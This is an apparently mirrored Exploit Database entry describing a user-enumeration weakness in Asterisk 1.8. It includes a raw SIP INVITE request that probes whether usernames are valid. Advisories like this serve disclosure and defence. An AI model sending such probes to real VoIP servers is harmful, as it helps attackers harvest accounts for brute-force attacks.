Asterisk 1.8.x – SIP INVITE Request User Enumeration

• Exploit Database
• 115 阅读

• 作者： Francesco Tornieri
  日期： 2011-05-02
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/35685/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  source: https://www.securityfocus.com/bid/47676/info   Asterisk is prone to a user-enumeration weakness.   An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.   This issue affects Asterisks 1.8.   The following request is available:   INVITE sip:192.168.2.1 SIP/2.0 CSeq: 3 INVITE Via: SIP/2.0/UDP www.example.com:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport User-Agent: TT From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2 To: <sip:500@192.168.2.1> Contact: <sip:105@localhost>;q=1 Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING Expires: 3600 Content-Length: 0 Max-Forwards: 70